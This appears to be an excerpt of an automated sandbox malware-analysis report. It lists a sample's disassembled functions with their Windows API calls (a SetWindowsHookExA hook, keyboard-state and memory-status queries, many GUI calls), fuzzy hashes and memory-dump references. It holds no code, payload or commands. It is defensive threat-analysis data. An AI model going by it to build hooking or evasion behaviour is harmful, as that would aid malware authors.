Opcode Fuzzy Hash: 072d8cc2d07947ec111c4e24202c9824f6896da765a476ea2c19f2f4c09e10b0
Instruction Fuzzy Hash: DBF01C74C00218EFCF11AFA5DC45A9DBAB0FF08750F504596F051A62A1D7359A45AF90

Function 00BDA0E3 Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00BDA0F6
SetWindowsHookExA.USER32(000000FF,Function_00009F48,00000000,00000000), ref: 00BDA106

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CurrentHookThreadWindows
String ID:
API String ID: 1904029216-0
Opcode ID: 13b715194f829c539e98ca214c87ba0fec2475b3468216e15730ceff5bdf2ee3
Instruction ID: 75223c3263e229f093afb8a38a732c70d7688232cb62c13a05fe743846f7f1c0
Opcode Fuzzy Hash: 13b715194f829c539e98ca214c87ba0fec2475b3468216e15730ceff5bdf2ee3
Instruction Fuzzy Hash: 99D0A7718043906EEB2067706C4AF49BED09B01320F060AC6F020992E1E664A8414B56

Function 061E75E0 Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3121874862.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40af312cfe252b51b7622c3b2007fc8889f4e433225cff9447e9b370086c24c0
Instruction ID: fbf0bdd9021f2e10f8f88a95f2343bdb523df159111b6c71038e32f24ebdd3ad
Opcode Fuzzy Hash: 40af312cfe252b51b7622c3b2007fc8889f4e433225cff9447e9b370086c24c0
Instruction Fuzzy Hash: C9413172E047958FDB10CFB9D8002AEBBF1EF89210F14866AD448A7281DB789885CBD0

Function 061E6FD1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,061E7632), ref: 061E771F

Memory Dump Source

Source File: 00000000.00000002.3121874862.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e0000_1.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 11e287a2cf63ed8cac4910d825b52d004605bef40051cb4f7b2ce84ad36c0f42
Instruction ID: 14f0938d61b54394207d035864c75700cf7fe6de4b4389ac30ded08074ac54af
Opcode Fuzzy Hash: 11e287a2cf63ed8cac4910d825b52d004605bef40051cb4f7b2ce84ad36c0f42
Instruction Fuzzy Hash: 342138B1C0469A9FDB10CFAAC4857AEFBF4EF08310F15816AD458A7240D378A941CBE1

Function 00BD2C00 Relevance: 1.6, APIs: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00BD2C4B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: 6819fe389f2261565a6a7e0848a92f7f14c8dc6fc2dadf36cd1306ed6916acfe
Instruction ID: 7999883215ffb6dbdaf8420f548feb3cdf045e2e42aee20eb675fb1f68b40609
Opcode Fuzzy Hash: 6819fe389f2261565a6a7e0848a92f7f14c8dc6fc2dadf36cd1306ed6916acfe
Instruction Fuzzy Hash: 86114C76600A05AFD718DF68C880C6AB7E9FF99310714869EE5598B350EB31ED01CBD0

Function 061E76B0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,061E7632), ref: 061E771F

Memory Dump Source

Source File: 00000000.00000002.3121874862.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e0000_1.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: c6db0ed11f0e7de124bac3035335355d100bf7714e20c7c22c5bf66788085c73
Instruction ID: 025d487a36690cbb208bbc0854292c8476d11fc2f0070c8d13ef30f6f8193030
Opcode Fuzzy Hash: c6db0ed11f0e7de124bac3035335355d100bf7714e20c7c22c5bf66788085c73
Instruction Fuzzy Hash: 8D1106B1C106999BDB10CFAAD5457DEFBF4EF48220F15816AD418A7240D378A945CFA1

Function 061E6F64 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,061E7632), ref: 061E771F

Memory Dump Source

Source File: 00000000.00000002.3121874862.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e0000_1.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 51c4e6970f7c8e06ecefa5afe744e3f34938f40aacabb99ada0b3191f411efae
Instruction ID: 23a9428e4b1939e09c6d1cc2d63fd31d6b45f3b4e66c512152f1b87aee67d18a
Opcode Fuzzy Hash: 51c4e6970f7c8e06ecefa5afe744e3f34938f40aacabb99ada0b3191f411efae
Instruction Fuzzy Hash: EF1103B1C0069A9BDB50CF9AC5447EEFBF4EB48224F15812AE818B7240D378A944CFE5

Function 00BDC02E Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00BD3070: FindResourceW.KERNEL32(?,?,00000006), ref: 00BD3088

WideCharToMultiByte.KERNEL32(00000000,00000000,-00000002,?,00000001,?,00000000,00000000,?,?,00000000,?,00BD71AA,?,?,00000080), ref: 00BDC077

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ByteCharFindMultiResourceWide
String ID:
API String ID: 3726879926-0
Opcode ID: a81af2a8655adc10d765a8290a6dc6b38dcbcbbf4daad222d84a4ae17a307f3a
Instruction ID: 08f401c3de4e0097c6fddfb2bdf130988c88f46d73099ea03644679a63e4f5aa
Opcode Fuzzy Hash: a81af2a8655adc10d765a8290a6dc6b38dcbcbbf4daad222d84a4ae17a307f3a
Instruction Fuzzy Hash: 97F09072104155BF97242FA59CC5DBBBBDCDA8576431545AFF5408B212E921DC80C370

Function 00BE389A Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE38A1

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: 55e5bfb25961ce8abab06f5ab9d49af13768ba7c1df0051ee24892736bdf436b
Instruction ID: 7e9e6d880033db43e702b57bf8d1d7e0da9f8cd9819be02d5b1642198cf4c052
Opcode Fuzzy Hash: 55e5bfb25961ce8abab06f5ab9d49af13768ba7c1df0051ee24892736bdf436b
Instruction Fuzzy Hash: A9017C34A042829BDB25AF7ACC1A73976E1EB90B54F14116DF4A1C7391EF34CE01DB20

Function 00BD3070 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,00000006), ref: 00BD3088

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: FindResource
String ID:
API String ID: 1635176832-0
Opcode ID: be84baa1ab292dfad79e1bb903e37df09f1bd20758288118964ad36533c7500f
Instruction ID: 174de9532882e4f6d96e7f18d7adbf1fa4cd7b865dfe24219b6b4053a21f9c8a
Opcode Fuzzy Hash: be84baa1ab292dfad79e1bb903e37df09f1bd20758288118964ad36533c7500f
Instruction Fuzzy Hash: 0CE0CD6630011837D520164EBC45BFBB7DCCBC1A76B004077FD4DDA201E165E91151F1

Function 00BE634A Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 00BFEAD4: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00BFEB07
Part of subcall function 00BFEAD4: _memset.LIBCMT ref: 00BFEB20

SystemParametersInfoA.USER32(00000029,-00000158,?,00000000), ref: 00BE636E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressInfoParametersProcSystem_memset
String ID:
API String ID: 831922234-0
Opcode ID: 3e2fd944c4691b4bfdae6c460cd46d6133fc31f8963a3388639e19c2a5bc9aeb
Instruction ID: 671f30f2f236bd6d5e362b9bc9f5d471451a3e5a42ba045de18ca3f24e9cfc5c
Opcode Fuzzy Hash: 3e2fd944c4691b4bfdae6c460cd46d6133fc31f8963a3388639e19c2a5bc9aeb
Instruction Fuzzy Hash: BDD0A7B3590688AFE7005B70EC0AF7A364DE7A0721F190620B624CE1D0DB75D8048210

Function 00BD854D Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BD855C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: DeleteObject
String ID:
API String ID: 1531683806-0
Opcode ID: 8eeb7e7e27402c2c4094917b5b19169afaacc3297edf6570caba0d6ed6e822ce
Instruction ID: 9fed4cc9830bbaa7a518c654e7471f0591f168efac79952cc55471fecec96058
Opcode Fuzzy Hash: 8eeb7e7e27402c2c4094917b5b19169afaacc3297edf6570caba0d6ed6e822ce
Instruction Fuzzy Hash: 34B09260801140AECE80AB70AA4871BABD49B6130BF008CD5A009D9151EE39E0498602

Function 0362D334 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3120964948.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_362d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8366edef539fc1c9820ee1ab6682e09965538784d63e0332d536b76031a06cdb
Instruction ID: 3d426d8219d96f7863dba96c690f0cfb7169068773e71ff4de5d2a99043bf11c
Opcode Fuzzy Hash: 8366edef539fc1c9820ee1ab6682e09965538784d63e0332d536b76031a06cdb
Instruction Fuzzy Hash: 1721C176504644DFDB05CF10D9C0F2ABF65FB88314F25C5A9E9194B246C33AD456CFA2

Function 0362D32F Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3120964948.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_362d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 224e5f7d5d699ae36746fb891df44c95f1ae5d17c8c22ca1def5ab9146d7ec64
Instruction ID: ce81b8a9a30748bc627234803eb315efb7ec898e8cedc2df97ea782c02fa3759
Opcode Fuzzy Hash: 224e5f7d5d699ae36746fb891df44c95f1ae5d17c8c22ca1def5ab9146d7ec64
Instruction Fuzzy Hash: 59218C76504680DFCB16CF10DAC4B16BF61FB84314F28C1AAD8484A656C33AD466CFA1

Function 0362D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3120964948.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_362d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c721c4c3f03d16d707e3057d12e7f99b9c8a41b345fa36f0c6906b983f21a3e7
Instruction ID: 8bd91710484cd83ba19a5572c30660b6aca5d604eb322dc58ea572e59e1e0622
Opcode Fuzzy Hash: c721c4c3f03d16d707e3057d12e7f99b9c8a41b345fa36f0c6906b983f21a3e7
Instruction Fuzzy Hash: 05012D7140D3D09FD7128B258D94752BFA8DF43224F1D84DBD9948F2A7C2689C45CB72

Function 0362D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3120964948.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_362d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1705e825a5fa813c794c36a6ca8dc8b5d21836cbf64f5bfb6636a2be13256b35
Instruction ID: 1bd61f5fc62e5591fc4b80411ecc59ff19f634735f9afe1a8d8cd0cc442531a8
Opcode Fuzzy Hash: 1705e825a5fa813c794c36a6ca8dc8b5d21836cbf64f5bfb6636a2be13256b35
Instruction Fuzzy Hash: 3501A231409B50ABE710CE25C984B67FF98DF41264F1CC45AED694A292C2799942CEB2

Non-executed Functions

Function 00BF5B75 Relevance: 51.8, APIs: 28, Strings: 1, Instructions: 1017windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00BF5BA8
IsWindow.USER32(?), ref: 00BF5BBD
MonitorFromPoint.USER32(?,?,00000002), ref: 00BF5C2E
GetMonitorInfoA.USER32(00000000), ref: 00BF5C35
CopyRect.USER32(?,?), ref: 00BF5C47
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00BF5C57
GetSystemMetrics.USER32(00000033), ref: 00BF5DDB
GetSystemMetrics.USER32(00000006), ref: 00BF5DE1
SendMessageA.USER32(?,00000401,00000001,00000000), ref: 00BF5E66
SendMessageA.USER32(?,00000418,00000000,FFFFFFFF), ref: 00BF5E80
SetRectEmpty.USER32(?), ref: 00BF60E3
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00BF614C
GetWindowRect.USER32(?,?), ref: 00BF622F
ClientToScreen.USER32(?,?), ref: 00BF647A
ClientToScreen.USER32(?,?), ref: 00BF64A1
ClientToScreen.USER32(?,?), ref: 00BF663A
ClientToScreen.USER32(?,?), ref: 00BF6662
GetSystemMetrics.USER32(00000002), ref: 00BF66FD
IsRectEmpty.USER32(?), ref: 00BF670D
GetSystemMetrics.USER32(00000002), ref: 00BF6719
GetWindowRect.USER32(?,?), ref: 00BF6819
IntersectRect.USER32(?,?,-00000054), ref: 00BF687A
InvalidateRect.USER32(?,-00000054,00000001), ref: 00BF688F
UpdateWindow.USER32(?), ref: 00BF6898
IntersectRect.USER32(?,?,-00000054), ref: 00BF68E1
InvalidateRect.USER32(?,-00000054,00000001), ref: 00BF68F6
UpdateWindow.USER32(?), ref: 00BF68FF
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,?,?,?,?,00000014), ref: 00BF693D

Strings

(, xrefs: 00BF5C24

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Window$System$ClientMetricsScreen$EmptyInfoIntersectInvalidateMessageMonitorRedrawSendUpdate$CopyFromParametersPoint
String ID: (
API String ID: 840757265-3887548279
Opcode ID: ade7efd93db47b85e344aa48fdc4ec2802758b6e9ae9633d03724b7d4ee69923
Instruction ID: b13a8f7143a0196270617cc4fe4323327330d85632af6dafef7f8bd83a1e7e0b
Opcode Fuzzy Hash: ade7efd93db47b85e344aa48fdc4ec2802758b6e9ae9633d03724b7d4ee69923
Instruction Fuzzy Hash: A8A2F771A006199FCB25CF68C984BEDB7F1EF48304F1841BAED49AB256DB70A985CF50

Function 00C43A6E Relevance: 42.5, APIs: 28, Instructions: 452windowkeyboardCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C43AA3
GetWindowRect.USER32(?,?), ref: 00C43AC6
PtInRect.USER32(?,?,?), ref: 00C43AD4

Part of subcall function 00C7273C: RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00C727B3

GetAsyncKeyState.USER32(00000012), ref: 00C43AF9
ScreenToClient.USER32(?,?), ref: 00C43B47
IsWindow.USER32(?), ref: 00C43B8E
IsWindow.USER32(?), ref: 00C43BD1
GetWindowRect.USER32(?,?), ref: 00C43BF1
PtInRect.USER32(?,?,?), ref: 00C43C01
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C43C36
PtInRect.USER32(-00000054,?,?), ref: 00C43C81
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C43CA6
ScreenToClient.USER32(?,?), ref: 00C43CFE
PtInRect.USER32(?,?,?), ref: 00C43D0E
GetParent.USER32(?), ref: 00C43D98
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C43E2B
GetFocus.USER32 ref: 00C43E31
WindowFromPoint.USER32(?,?,00000000), ref: 00C43E69
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C43EB3
GetSystemMenu.USER32(?,00000000,?,?,753DA000,?), ref: 00C43F3C
IsMenu.USER32(?), ref: 00C43F5E
EnableMenuItem.USER32(?,0000F030,00000000), ref: 00C43F7B
EnableMenuItem.USER32(?,0000F120,00000000), ref: 00C43F86
IsZoomed.USER32(?), ref: 00C43F94
IsIconic.USER32(?), ref: 00C43FB3
EnableMenuItem.USER32(?,0000F120,00000003), ref: 00C43FC7
TrackPopupMenu.USER32(?,00000100,?,?,00000000,?,00000000), ref: 00C43FEF
SendMessageA.USER32(?,00000112,00000000,00000000), ref: 00C44009

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$MenuRect$MessageSend$EnableItem$ClientScreen$AsyncFocusFromIconicParentPointPopupRedrawStateSystemTrackVisibleZoomed
String ID:
API String ID: 3398603409-0
Opcode ID: c619d1c30c156a59816ac5c300f1d8684c1ff4091625094aa9371e73c92ecc60
Instruction ID: f5b256437693a3d39cb1113050bcc7c9096b2f1316cdc9fc273d74420dc29ba9
Opcode Fuzzy Hash: c619d1c30c156a59816ac5c300f1d8684c1ff4091625094aa9371e73c92ecc60
Instruction Fuzzy Hash: 9EF16D71A00285EFDB24DFA4DC84AADBBF9FB88340B154469F556E7260DB31AE40DB21

Function 00C3D3AB Relevance: 27.6, APIs: 14, Strings: 1, Instructions: 1378COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C3D3B5
InflateRect.USER32(000000FE,000000FD,00000000), ref: 00C3D428
GetParent.USER32(?), ref: 00C3D4D4

Part of subcall function 00BEAECF: __EH_prolog3.LIBCMT ref: 00BEAED6

Strings

..., xrefs: 00C3E052

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: H_prolog3H_prolog3_InflateParentRect
String ID: ...
API String ID: 1906238279-440645147
Opcode ID: 45be25de0254062e08733eab05c2849dc3f98a3781c56408ce4d99b22eac2740
Instruction ID: 796b72c8c0683a263d115607471123885fb15d9c85defe9469df0efc415afaba
Opcode Fuzzy Hash: 45be25de0254062e08733eab05c2849dc3f98a3781c56408ce4d99b22eac2740
Instruction Fuzzy Hash: 77C2A271900219CFCF25DF64C885BAEB7B5FF49300F2441A9E815AB292DB709E81CF91

Function 00C294DE Relevance: 27.4, APIs: 18, Instructions: 386windowkeyboardCOMMON

Download Yara Rule

APIs

MessageBeep.USER32 ref: 00C29505
SendMessageA.USER32(?,000000B0,?,?), ref: 00C2954A
SendMessageA.USER32(?,000000B0,?,?), ref: 00C295F7
SendMessageA.USER32(?,000000B0,?,?), ref: 00C29791
GetKeyState.USER32(00000010), ref: 00C297C6
SendMessageA.USER32(?,000000B0,?,?), ref: 00C297DC
GetKeyState.USER32(00000011), ref: 00C29808
SendMessageA.USER32(?,000000B0,?,?), ref: 00C2981E
SendMessageA.USER32(?,000000B0,?,?), ref: 00C29866

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Message$Send$State$Beep
String ID:
API String ID: 4138746095-0
Opcode ID: 62d8c69152e66b2c73840b23cb1d5dfcd88087cda7f73c3f1271408589ff2723
Instruction ID: 2a599919e8086e2739b100d51a9ba62a5f3547ab327c6d8b93c5285b239bd654
Opcode Fuzzy Hash: 62d8c69152e66b2c73840b23cb1d5dfcd88087cda7f73c3f1271408589ff2723
Instruction Fuzzy Hash: D5D14871200669BFDF11DF54DC84EEE37ADFB08B10F14861AFA26DA990D730EA409B65

Function 00C097D6 Relevance: 21.3, APIs: 14, Instructions: 280keyboardwindowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C098BA
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00C098D6
GetCapture.USER32 ref: 00C09950
GetKeyState.USER32(00000011), ref: 00C099B2
GetKeyState.USER32(00000010), ref: 00C099BF
ImmGetContext.IMM32(?), ref: 00C099CD
ImmGetOpenStatus.IMM32(00000000,?), ref: 00C099DA
ImmReleaseContext.IMM32(?,00000000,?), ref: 00C099FC
GetFocus.USER32 ref: 00C09A26
IsWindow.USER32(?), ref: 00C09A67
IsWindow.USER32(?), ref: 00C09AED
ClientToScreen.USER32(?,?), ref: 00C09AFD
IsWindow.USER32(?), ref: 00C09B23
ClientToScreen.USER32(?,?), ref: 00C09B52

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
String ID:
API String ID: 1155058817-0
Opcode ID: 0a52752a70810c96a10944ad1cad63c03ae3161131a9f20649a1c763d0dad20a
Instruction ID: d1890959e4a9d31d8e0b3955281bc94842f2aed545fccc717409cea41dfea741
